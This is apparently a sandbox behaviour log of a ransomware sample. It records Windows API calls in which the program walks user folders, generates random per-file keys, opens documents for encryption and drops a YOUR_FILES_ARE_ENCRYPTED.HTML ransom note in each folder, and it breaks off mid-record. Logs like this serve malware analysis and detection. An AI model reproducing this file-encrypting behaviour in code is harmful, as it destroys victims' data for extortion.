[0167.280] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="65") returned 2 [0167.280] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="ED") returned 2 [0167.280] wsprintfW (in: param_1=0x4ebdd52, 
param_2="%02X" | out: param_1="79") returned 2 [0167.280] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="14") returned 2 [0167.280] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="41") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="7A") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="4C") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="05") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="04") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="94") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="6F") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="AC") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="92") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="F0") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="C5") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="2C") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="77") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="76") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="E7") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="47") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="0C") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="28") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="E6") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="C0") returned 2 [0167.281] wsprintfW 
(in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="BB") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="1F") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="2B") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="85") returned 2 [0167.282] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="4B") returned 2 [0167.282] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="5A") returned 2 [0167.282] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\zgPO1s6dkb.docx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\zgPO1s6dkb.docx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\zgPO1s6dkb.docx" [0167.282] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.282] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.287] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1535f30, ftCreationTime.dwHighDateTime=0x1d7e750, ftLastAccessTime.dwLowDateTime=0xcab9bec0, ftLastAccessTime.dwHighDateTime=0x1d7e78b, ftLastWriteTime.dwLowDateTime=0xcab9bec0, ftLastWriteTime.dwHighDateTime=0x1d7e78b, nFileSizeHigh=0x0, nFileSizeLow=0xb6d2, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="zHVfqFS9ZJabb9iU.xlsx", cAlternateFileName="ZHVFQF~1.XLS")) returned 1 [0167.291] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\zHVfqFS9ZJabb9iU.xlsx") returned 55 [0167.291] lstrcmpW (lpString1="zHVfqFS9ZJabb9iU.xlsx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0167.291] PathFindExtensionW (pszPath="zHVfqFS9ZJabb9iU.xlsx") 
returned=".xlsx" [0167.291] lstrlenW (lpString=".xlsx") returned 5 [0167.291] PathFindExtensionW (pszPath="zHVfqFS9ZJabb9iU.xlsx") returned=".xlsx" [0167.291] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\zHVfqFS9ZJabb9iU.xlsx" (normalized: "c:\\users\\5alr3u30d3\\documents\\zhvfqfs9zjabb9iu.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.292] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=46802) returned 1 [0167.292] GetProcessHeap () returned 0x270000 [0167.292] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.293] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="20") returned 2 [0167.293] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="71") returned 2 [0167.293] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="50") returned 2 [0167.293] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="A3") returned 2 [0167.293] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="78") returned 2 [0167.293] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="5C") returned 2 [0167.293] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="CE") returned 2 [0167.293] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="8C") returned 2 [0167.293] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="DD") returned 2 [0167.293] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="A2") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="A8") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="58") returned 2 [0167.294] wsprintfW (in: 
param_1=0x4ebdd72, param_2="%02X" | out: param_1="49") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="46") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="23") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="9F") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="3B") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="28") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="D7") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="5D") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="66") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="91") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="1A") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="CF") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="7A") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="8B") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="D4") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="79") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="FA") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="78") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="89") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="73") returned 2 [0167.295] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\zHVfqFS9ZJabb9iU.xlsx" | out: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\zHVfqFS9ZJabb9iU.xlsx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\zHVfqFS9ZJabb9iU.xlsx" [0167.295] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.295] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.306] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa10419c0, ftCreationTime.dwHighDateTime=0x1d7dbd0, ftLastAccessTime.dwLowDateTime=0x6693590, ftLastAccessTime.dwHighDateTime=0x1d7e494, ftLastWriteTime.dwLowDateTime=0x6693590, ftLastWriteTime.dwHighDateTime=0x1d7e494, nFileSizeHigh=0x0, nFileSizeLow=0x15756, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="ZSOjcpxzwxusjl.pdf", cAlternateFileName="ZSOJCP~1.PDF")) returned 1 [0167.306] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\ZSOjcpxzwxusjl.pdf") returned 52 [0167.306] lstrcmpW (lpString1="ZSOjcpxzwxusjl.pdf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0167.306] PathFindExtensionW (pszPath="ZSOjcpxzwxusjl.pdf") returned=".pdf" [0167.306] lstrlenW (lpString=".pdf") returned 4 [0167.306] PathFindExtensionW (pszPath="ZSOjcpxzwxusjl.pdf") returned=".pdf" [0167.307] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\ZSOjcpxzwxusjl.pdf" (normalized: "c:\\users\\5alr3u30d3\\documents\\zsojcpxzwxusjl.pdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.308] GetFileSizeEx (in: hFile=0x5ac, 
lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=87894) returned 1 [0167.308] GetProcessHeap () returned 0x270000 [0167.308] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.309] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="C9") returned 2 [0167.309] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="BC") returned 2 [0167.309] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="48") returned 2 [0167.309] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="6F") returned 2 [0167.309] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="65") returned 2 [0167.309] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="C1") returned 2 [0167.309] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="58") returned 2 [0167.309] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="55") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="16") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="24") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="BB") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="F6") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="A4") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="0D") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="59") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="30") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="2E") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="0D") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="92") returned 2 [0167.310] wsprintfW (in: 
param_1=0x4ebdd8e, param_2="%02X" | out: param_1="A7") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="87") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="17") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="F7") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="FF") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="A3") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="7D") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="42") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="97") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="64") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="B5") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="6C") returned 2 [0167.311] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="7D") returned 2 [0167.311] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\ZSOjcpxzwxusjl.pdf" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\ZSOjcpxzwxusjl.pdf") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\ZSOjcpxzwxusjl.pdf" [0167.311] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.311] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.331] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11925970, ftCreationTime.dwHighDateTime=0x1d7dc05, 
ftLastAccessTime.dwLowDateTime=0xaae23350, ftLastAccessTime.dwHighDateTime=0x1d7e495, ftLastWriteTime.dwLowDateTime=0xaae23350, ftLastWriteTime.dwHighDateTime=0x1d7e495, nFileSizeHigh=0x0, nFileSizeLow=0x5e94, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="_ DUv9WKDNJMEUH.ots", cAlternateFileName="_DUV9W~1.OTS")) returned 1 [0167.331] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\_ DUv9WKDNJMEUH.ots") returned 53 [0167.331] lstrcmpW (lpString1="_ DUv9WKDNJMEUH.ots", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.332] PathFindExtensionW (pszPath="_ DUv9WKDNJMEUH.ots") returned=".ots" [0167.332] lstrlenW (lpString=".ots") returned 4 [0167.332] PathFindExtensionW (pszPath="_ DUv9WKDNJMEUH.ots") returned=".ots" [0167.332] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11925970, ftCreationTime.dwHighDateTime=0x1d7dc05, ftLastAccessTime.dwLowDateTime=0xaae23350, ftLastAccessTime.dwHighDateTime=0x1d7e495, ftLastWriteTime.dwLowDateTime=0xaae23350, ftLastWriteTime.dwHighDateTime=0x1d7e495, nFileSizeHigh=0x0, nFileSizeLow=0x5e94, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="_ DUv9WKDNJMEUH.ots", cAlternateFileName="_DUV9W~1.OTS")) returned 0 [0167.332] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0167.332] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 63 [0167.332] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\documents\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0167.333] WriteFile (in: 
hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0167.335] CloseHandle (hObject=0x5a0) returned 1 [0167.335] GetProcessHeap () returned 0x270000 [0167.336] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0167.341] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b80a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0167.341] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Downloads") returned 33 [0167.341] GetProcessHeap () returned 0x270000 [0167.341] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0167.342] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Downloads" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Downloads") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Downloads" [0167.342] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Downloads", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Downloads\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Downloads\\*" [0167.342] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Downloads\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, 
ftLastWriteTime.dwLowDateTime=0xd5b80a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0167.343] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b80a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0167.343] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd2428b10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b80a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0167.343] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Downloads\\desktop.ini") returned 45 [0167.343] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.343] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0167.343] lstrlenW (lpString=".ini") returned 4 [0167.343] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0167.343] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd2428b10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, 
ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b80a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0167.343] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0167.343] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Downloads\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 63 [0167.343] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Downloads\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\downloads\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0167.344] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0167.346] CloseHandle (hObject=0x5a0) returned 1 [0167.346] GetProcessHeap () returned 0x270000 [0167.347] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0167.347] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b347d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0167.347] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites") returned 33 
[0167.347] GetProcessHeap () returned 0x270000 [0167.347] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0167.347] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites" [0167.347] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\*" [0167.347] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b347d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0167.348] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b347d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0167.348] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd2428b10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b5a930, 
ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0167.348] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\desktop.ini") returned 45 [0167.348] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.348] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0167.348] lstrlenW (lpString=".ini") returned 4 [0167.348] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0167.348] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xab4e47e0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Links", 